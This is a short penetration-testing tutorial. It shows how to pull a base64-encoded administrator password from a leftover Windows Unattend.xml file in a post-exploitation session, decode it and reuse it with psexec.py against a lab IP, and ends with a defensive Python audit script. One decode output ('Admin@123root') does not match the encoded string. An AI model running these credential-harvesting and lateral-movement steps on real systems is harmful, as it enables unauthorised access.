Credentials Dumping

Passwords Configuration Files

Windows configuration files can contain stored passwords, for example the answer files used by the Unattended Windows Setup utility to mass-deploy Windows on systems.

  • The configuration file can contain specific system settings and user account credentials

  • An attacker can find the configuration file left on the target after installation

The utility typically uses these files:

C:\Windows\Panther\Unattend.xml

C:\Windows\Panther\Autounattend.xml

  • The stored passwords might be base64-encoded (easily decodable).

Exploitation

After getting a meterpreter session or a shell session, follow this technique:

  • Manually search for the unattend.xml file; it should be inside

    • C:\Windows\Panther

cd C:\\Windows\\Panther
dir
download unattend.xml
  • In a new terminal tab, read the downloaded file:

cat unattend.xml

Get Access

  • The administrator user's configured password is stored base64-encoded as QWRtaW5AMTIz

    • Save it to a new file

    • Decode it using the base64 tool

nano password.txt
# paste the password, save and exit the file

base64 -d password.txt
Admin@123root
  • Test the administrator:Admin@123root credentials with the psexec tool

psexec.py administrator@10.4.19.9

You have gained access to the administrator account.
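The defensive counterpart to the steps above, as an added example that is not part of the original page: a Python audit that scans an Unattend.xml left on an image for Password elements that still carry a value, so a deployment-hygiene check can flag the file for cleanup. The XML sample is constructed for this example and both credential values in it are placeholders; the report deliberately states only how the secret is stored, never the secret itself.

```python
import base64
import xml.etree.ElementTree as ET

NS = "{urn:schemas-microsoft-com:unattend}"

# Constructed sample shaped like the AutoLogon/UserAccounts sections of a real Unattend.xml; values are placeholders.
SAMPLE_UNATTEND = """<unattend xmlns="urn:schemas-microsoft-com:unattend">
  <settings pass="oobeSystem"><component name="Microsoft-Windows-Shell-Setup">
    <AutoLogon>
      <Username>administrator</Username><Enabled>true</Enabled>
      <Password><Value>QWRtaW5AMTIz</Value><PlainText>false</PlainText></Password>
    </AutoLogon>
    <UserAccounts><LocalAccounts><LocalAccount>
      <Name>deployuser</Name>
      <Password><Value>ChangeMe!</Value><PlainText>true</PlainText></Password>
    </LocalAccount></LocalAccounts></UserAccounts>
  </component></settings>
</unattend>"""


def _decodes_as_base64(value):
    try:
        base64.b64decode(value, validate=True)
        return True
    except ValueError:  # binascii.Error is a ValueError subclass
        return False


def find_stored_credentials(xml_text):
    """One finding per Password/AdministratorPassword element whose Value is non-empty."""
    root = ET.fromstring(xml_text)
    parent = {child: p for p in root.iter() for child in p}
    findings = []
    for elem in root.iter():
        tag = elem.tag.replace(NS, "")
        if tag not in ("Password", "AdministratorPassword"):
            continue
        value = (elem.findtext(NS + "Value") or "").strip()
        if not value:
            continue  # an emptied Value is what a cleaned-up image should contain
        plaintext = (elem.findtext(NS + "PlainText") or "false").strip().lower() == "true"
        owner = parent[elem]
        account = "Administrator" if tag == "AdministratorPassword" else (
            owner.findtext(NS + "Username") or owner.findtext(NS + "Name") or "?")
        # Record that a secret is present and how it is stored, never the secret itself.
        findings.append({"account": account, "plaintext": plaintext,
                         "recoverable": plaintext or _decodes_as_base64(value)})
    return findings


def audit_lines(xml_text):
    return [f"{f['account']}: {'plaintext' if f['plaintext'] else 'base64'} password left "
            f"in file, recoverable={f['recoverable']}" for f in find_stored_credentials(xml_text)]
```

An empty result from audit_lines means every Value element has been blanked, which is the state the Panther directory should be left in after deployment.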
